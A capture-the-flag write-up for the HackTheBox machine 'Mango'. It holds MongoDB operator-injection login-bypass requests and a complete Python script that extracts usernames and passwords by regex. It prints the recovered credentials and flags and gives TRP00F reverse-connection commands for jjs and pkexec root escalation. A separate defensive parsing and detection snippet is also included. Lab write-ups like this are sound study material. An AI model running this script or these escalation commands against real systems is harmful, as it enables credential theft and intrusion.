[Machines] [Medium] Mango: PHP loose-comparison bypass + MongoDB injection + TRP00F automated privilege escalation + JJS privilege escalation
Word count: 743 | 2025-08-19 12:41:32
MongoDB injection and privilege escalation explained
Reconnaissance
Initial scan
Target IP: 10.10.10.162
Open ports:
- 22/tcp (SSH) - OpenSSH 7.6p1 Ubuntu
- 80/tcp (HTTP) - Apache httpd 2.4.29
- 443/tcp (HTTPS) - Apache httpd 2.4.29
Hostname configuration
echo '10.10.10.162 mango.htb staging-order.mango.htb' >> /etc/hosts
MongoDB injection attack
How the injection works
The target site talks to MongoDB from PHP and is vulnerable to NoSQL injection. PHP turns a bracketed form field name such as password[$ne] into an array, and that array is passed to MongoDB unchanged, where it is interpreted as a query operator. The operators used here are $ne (not equal) and $regex (regular-expression match).
Authentication bypass techniques
- Basic bypass:
  POST / HTTP/1.1
  username=admin&password[$ne]=admin&login=login
  Equivalent MongoDB query:
  db.users.find({ username: "admin", password: {$ne:"admin"} });
- Regular-expression injection:
  POST / HTTP/1.1
  username[$regex]=a.*&password[$ne]=admin&login=login
  Equivalent MongoDB query:
  db.users.find({username: { $regex: "a.*" }, password: { $ne: "admin" }});
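To make the mechanism behind the two requests above concrete from the defender's side, here is an added Python example (not code from the original write-up) that decodes a form body the way PHP does, builds the login filter both the vulnerable way and with a type check that rejects operator objects, and flags such requests for log review; the function names are my own.

```python
import re
from urllib.parse import parse_qsl

OPERATOR_PREFIX = '$'


def parse_php_query(body):
    """Decode a form body the way PHP does: a bracketed name such as
    'password[$ne]=admin' becomes {'password': {'$ne': 'admin'}}."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = re.fullmatch(r'([^\[\]]+)\[([^\[\]]*)\]', key)
        if match:
            params.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            params[key] = value
    return params


def login_filter_unsafe(params):
    """The vulnerable pattern: user input is dropped straight into the
    MongoDB filter, so {'$ne': 'admin'} becomes a query operator."""
    return {'username': params.get('username'), 'password': params.get('password')}


def login_filter_safe(params):
    """Hardened version: only plain strings may reach the query.
    Anything else (an array turned operator object) is rejected up front."""
    username = params.get('username')
    password = params.get('password')
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError('username and password must be plain strings')
    return {'username': username, 'password': password}


def looks_like_operator_injection(params):
    """Detection helper for request logs: True when any login field carries a
    nested key starting with '$' (e.g. $ne, $regex)."""
    return any(
        isinstance(v, dict) and any(k.startswith(OPERATOR_PREFIX) for k in v)
        for v in params.values()
    )


if __name__ == '__main__':
    # Constructed request body: the basic bypass shown above
    body = 'username=admin&password[$ne]=admin&login=login'
    params = parse_php_query(body)
    print('unsafe filter:', login_filter_unsafe(params))
    print('flagged:', looks_like_operator_injection(params))
```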
Automated injection script
Full Python script (exp.py):
```python
import re
from requests import post
from string import ascii_lowercase, ascii_uppercase, digits, punctuation

url = 'http://staging-order.mango.htb/'


class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def get_characters():
    """Identify the characters that usernames can start with."""
    charset = ascii_lowercase + ascii_uppercase + digits
    found_chars = []
    for char in charset:
        # A 302 redirect means the login succeeded, i.e. the regex matched a user
        response = post(url, data={
            'username[$regex]': f'^{char}.*',
            'password[$ne]': 'password',
            'login': 'login'
        }, allow_redirects=False)
        if response.status_code == 302:
            found_chars.append(char)
            print(f"{Colors.OKGREEN}[+] Found character: {char}{Colors.ENDC}")
    return found_chars


def build_usernames(chars):
    """Build full usernames from the identified first characters."""
    print(f"{Colors.WARNING}[*] Building usernames...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits
    usernames = []
    for char in chars:
        username = char
        while True:
            found_char = False
            for next_char in charset:
                regex = f'^{username + next_char}.*'
                response = post(url, data={
                    'username[$regex]': regex,
                    'password[$ne]': 'password',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    username += next_char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{next_char}' for username: {username}{Colors.ENDC}")
                    break
            # No further character extends the prefix: the username is complete
            if not found_char:
                break
        usernames.append(username)
        print(f"{Colors.OKGREEN}[+] Found username: {username}{Colors.ENDC}")
    return usernames


def escape_special_characters(s):
    """Escape regex metacharacters in the string so it matches literally."""
    return re.escape(s)


def find_passwords(usernames):
    """Try to recover the password for each identified username."""
    print(f"{Colors.WARNING}[*] Finding passwords for users...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits + punctuation
    results = []
    for user in usernames:
        password = ''
        while True:
            found_char = False
            for char in charset:
                escaped_password = escape_special_characters(password + char)
                response = post(url, data={
                    'username': user,
                    'password[$regex]': f'^{escaped_password}.*',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    password += char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{char}' for password: {password}{Colors.ENDC}")
                    break
            if not found_char:
                break
        results.append((user, password))
        print(f"{Colors.OKGREEN}[+] Password found for user {user}: {password}{Colors.ENDC}")
    return results


def print_results(results):
    """Print the results as a table."""
    print(f"{Colors.HEADER}\n[+] Final results:{Colors.ENDC}")
    print(f"{Colors.BOLD}{'Username':<20} {'Password':<20}{Colors.ENDC}")
    print(f"{'='*40}")
    for user, password in results:
        print(f"{user:<20} {password:<20}")


if __name__ == '__main__':
    chars = get_characters()
    usernames = build_usernames(chars)
    results = find_passwords(usernames)
    print_results(results)
```
Execution result:
Username             Password
========================================
admin                t9KcS3>!0B#2
mango                h3mXK8RhU~f{]f5H
Initial access
Log in over SSH with the recovered credentials:
ssh mango@mango.htb
# password: h3mXK8RhU~f{]f5H
su admin
# password: t9KcS3>!0B#2
Read the user flag:
6fcde02686f818d7a13592d510c4867f
Privilege escalation techniques
Method 1: JJS privilege escalation
Use the TRP00F tool to exploit jjs:
python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999
Select the jjs exploit option:
[!] Do you want to exploit the vulnerability in file jjs? (y/n) >y
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >n
Method 2: pkexec privilege escalation
Again with the TRP00F tool:
python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999
Select the pkexec exploit option:
[!] Do you want to exploit the vulnerability in file jjs? (y/n) >n
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y
Read the root flag:
110c3bcc1eb4a29e3da9c2e1d372c50d
Key takeaways
- MongoDB injection:
  - The $ne operator bypasses authentication
  - The $regex operator enumerates data
  - PHP array syntax (param[]=value) is what turns form fields into MongoDB operators
- Automated injection:
  - Enumerate characters in stages
  - Build complete credentials incrementally with regular expressions
  - Escape special characters
- Privilege escalation:
  - Multiple paths (jjs and pkexec)
  - The TRP00F tool automates the process
  - Choose the method that best fits the target system
- Tool usage:
  - TRP00F offers several privilege escalation options
  - Listener ports and the HTTP server are configurable
  - The exploit method is chosen interactively